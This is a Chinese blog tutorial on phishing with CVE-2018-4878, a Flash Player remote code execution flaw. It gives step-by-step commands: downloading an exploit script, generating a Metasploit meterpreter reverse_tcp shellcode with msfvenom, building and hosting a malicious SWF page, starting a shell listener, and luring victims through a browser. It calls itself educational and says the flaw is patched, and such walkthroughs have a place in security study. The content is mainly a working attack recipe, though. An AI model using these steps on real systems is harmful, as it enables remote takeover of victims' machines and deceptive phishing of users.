adobe flash player是干什么用的(adobe flash player)

文章前言

本篇文章主要介绍如何通过利用Adobe Flash Player的漏洞进行社工钓鱼,该漏洞目前已被修复,在实战中利用已不太奏效,仅作为学习

钓鱼实践

影响范围

Adobe Flash Player<=28.0.0.137

漏洞简介

2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞,攻击者可以通过构造特殊的Flash链接,之后诱导用户用浏览器/邮件/Office访问此Flash链接,从而实现\\”远程代码执行\\”,并且直接被Getshell,该漏洞于2017年底由韩国计算机应急小组(KR-CERT)首次发现

演示环境
  • 攻击主机:Kali Linux

  • 目标主机:Windows 7 sp1

  • 漏洞载荷:CVE-2018-4878.py

  • flash版本:flashplayer_activex_28.0.0.137.exe

钓鱼演示

Step 1:下载漏洞利用脚本

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

adobe flash player是干什么用的(adobe flash player)

adobe flash player是干什么用的(adobe flash player)

Step 2:修改载荷,将代码中的stageless变量改成\\”stageless = False\\”

adobe flash player是干什么用的(adobe flash player)

Step 3:使用msf生成shellcode

msfvenom -p  windows/meterpreter/reverse_tcp  lhost=192.168.174.131 lport=5678  -f  python>shellcode.txt

adobe flash player是干什么用的(adobe flash player)

Step 4:之替换CVE-2018-4878中的shellcode

adobe flash player是干什么用的(adobe flash player)

Step 5:修改CVE-2018-4878.py下面的文件信息

adobe flash player是干什么用的(adobe flash player)

Step 6:使用Python执行CVE-2018-4878.py代码,之后生成exploit.swf文件和index.html文件

adobe flash player是干什么用的(adobe flash player)

Step 7:之后在Kali Linux开启Apache2服务,并将上面的2个文件放入/var/www/html目录中(Apache web路径)

adobe flash player是干什么用的(adobe flash player)

Step 8:Kali Linux开启Shell会话监听

msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.174.131msf exploit(handler) > set lport 5678 msf exploit(handler) > exploit

adobe flash player是干什么用的(adobe flash player)

Step 9:诱导用户通过IE浏览器访问页面

adobe flash player是干什么用的(adobe flash player)

Step 10:Kali Linux 上获取meterpreter shell:

文末小结

从上面的演示中可以看到最终由于Flash存在CVE-2018-4878高危漏洞,导致Windows靶机访问含flash的页面时,直接被Kali Linux控制,真实环境下,很多黑客基于此Flash漏洞,结合社会工程学,例如将网页链接放置在诱导邮件中,欺骗大量用户点击,来达到最规模攻击效果

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34086.html

(0)
七芒星实验室's avatar七芒星实验室
上一篇 2024年4月20日 下午2:36
下一篇 2024年4月20日 下午2:38

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注